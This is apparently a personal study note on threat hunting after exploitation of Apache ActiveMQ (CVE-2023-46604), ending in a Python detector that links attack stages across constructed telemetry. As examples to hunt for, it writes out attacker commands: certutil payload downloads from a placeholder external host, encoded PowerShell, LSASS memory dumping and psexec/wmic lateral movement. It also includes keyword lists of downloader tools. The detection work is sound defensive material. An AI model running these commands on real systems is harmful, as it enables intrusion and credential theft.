Note: Like the previous post, I wrote this down for myself while going through this course by Leszek Mis.
Assume an internet-facing Apache ActiveMQ server has been exploited (CVE-2023-46604). Start the hunt from that host and move outward. The attacker path is predictable: execution → discovery → credential access → lateral movement → persistence.
The first thing to check is execution from the Java process. The exploit results in command execution through java.exe (the ActiveMQ process). That process should not be spawning shells or LOLBins. Hunt for child processes of java.exe or of the ActiveMQ service account.
Example process chain to investigate:
java.exe
└─ cmd.exe
   └─ certutil.exe -urlcache -f http://<external>/payload.exe
or
java.exe
└─ powershell.exe -enc <payload>
Telemetry sources that expose this quickly:
EDR process telemetry, Sysmon Event ID 1 (process creation), Windows Security event 4688 (with command-line auditing enabled).
Once execution exists, attackers usually enumerate the environment. Hunt for bursts of discovery commands executed from the compromised host.
Examples:
whoami
whoami /all
ipconfig /all
net user
net group "domain admins" /domain
nltest /dclist
arp -a
net view
Signals worth investigating:
multiple discovery commands executed within seconds or minutes,
commands executed from cmd.exe or powershell.exe,
parent process tracing back to java.exe.
Next step is payload delivery. Attackers frequently use built-in tools to fetch additional binaries.
Look for commands like:
certutil -urlcache -f
powershell Invoke-WebRequest
powershell iwr
bitsadmin /transfer
Example artifact:
certutil.exe -urlcache -f http://<external>/a.exe C:\ProgramData\a.exe
Hunt for outbound HTTP from application servers and for new executables written to temp or ProgramData directories, especially when followed by execution of that file.
Credential access typically follows. The goal is access to LSASS.
Common activity includes:
procdump.exe -ma lsass
rundll32.exe comsvcs.dll MiniDump
Detection signals include processes opening handles to lsass.exe, abnormal access rights on those handles, or memory dump files appearing on disk. Sysmon Event ID 10 (ProcessAccess) and EDR memory alerts usually expose this stage.
Once credentials exist, the compromised server becomes a pivot. Hunt for lateral movement originating from the application server.
Examples:
wmic /node:<host> process call create
psexec \\host cmd.exe
Another common signal is authentication bursts: a single server authenticating to multiple internal systems within a short time window.
Example pattern:
ActiveMQ01 → DC01
ActiveMQ01 → FILE01
ActiveMQ01 → APP02
Application servers rarely perform administrative authentication across multiple hosts.
Finally, check persistence mechanisms created shortly after the compromise. Common artifacts include scheduled tasks and services.
Example:
TaskName: UpdateService
Command: powershell -encodedcommand <payload>
Creator: service account
Creation of scheduled tasks invoking PowerShell or scripts outside maintenance windows is a strong signal.
The hunt should focus on the sequence rather than individual events.
java.exe → shell execution
shell → discovery commands
shell → payload download
payload → LSASS access
compromised host → lateral authentication
Single events can be benign, but the chain is not.
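The first three links of that chain (java.exe spawning a shell, a discovery burst, a built-in downloader) as hunting logic over process-creation telemetry, added here as an example and not part of the original notes or the course material. The events are constructed Sysmon Event 1-style records, and the process-name lists, the five-minute window and the three-command threshold are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Sysmon Event 1-style records for this example (not real telemetry):
# (timestamp, host, parent image, child image, command line)
EVENTS = [
    ("2024-01-10T02:00:01", "ActiveMQ01", "java.exe", "cmd.exe", "cmd.exe /c whoami"),
    ("2024-01-10T02:00:03", "ActiveMQ01", "cmd.exe", "whoami.exe", "whoami /all"),
    ("2024-01-10T02:00:05", "ActiveMQ01", "cmd.exe", "net.exe", 'net group "domain admins" /domain'),
    ("2024-01-10T02:00:08", "ActiveMQ01", "cmd.exe", "nltest.exe", "nltest /dclist"),
    ("2024-01-10T02:01:30", "ActiveMQ01", "cmd.exe", "certutil.exe",
     "certutil -urlcache -f http://<external>/a.exe C:\\ProgramData\\a.exe"),
    ("2024-01-10T09:15:00", "FILE01", "cmd.exe", "ipconfig.exe", "ipconfig /all"),  # lone, benign
]

# Assumed lists: children java.exe should never spawn, discovery tools, built-in downloaders
SHELLS_AND_LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe",
                      "bitsadmin.exe", "rundll32.exe", "wscript.exe", "cscript.exe"}
DISCOVERY = {"whoami.exe", "ipconfig.exe", "net.exe", "net1.exe", "nltest.exe", "arp.exe"}
DOWNLOADERS = ("certutil", "invoke-webrequest", "iwr", "bitsadmin")

def java_spawns(events):
    """Stage 1: java.exe (ActiveMQ) spawning a shell or LOLBin."""
    return [e for e in events
            if e[2].lower() == "java.exe" and e[3].lower() in SHELLS_AND_LOLBINS]

def discovery_bursts(events, window=timedelta(minutes=5), min_count=3):
    """Stage 2: hosts running at least min_count discovery commands inside one window."""
    per_host = defaultdict(list)
    for e in events:
        if e[3].lower() in DISCOVERY:
            per_host[e[1]].append(datetime.fromisoformat(e[0]))
    hits = []
    for host, times in per_host.items():
        times.sort()  # sliding window over sorted timestamps
        if any(times[i + min_count - 1] - times[i] <= window
               for i in range(len(times) - min_count + 1)):
            hits.append(host)
    return hits

def download_commands(events):
    """Stage 3: built-in downloader keywords in the command line."""
    return [e for e in events if any(k in e[4].lower() for k in DOWNLOADERS)]

def chained_hosts(events):
    """Hosts where all three stages line up: the chain, not any single event."""
    s1 = {e[1] for e in java_spawns(events)}
    s2 = set(discovery_bursts(events))
    s3 = {e[1] for e in download_commands(events)}
    return sorted(s1 & s2 & s3)
```

FILE01 runs one discovery command and never appears in the result, which is the point: the lone event is noise, the sequence on ActiveMQ01 is the finding.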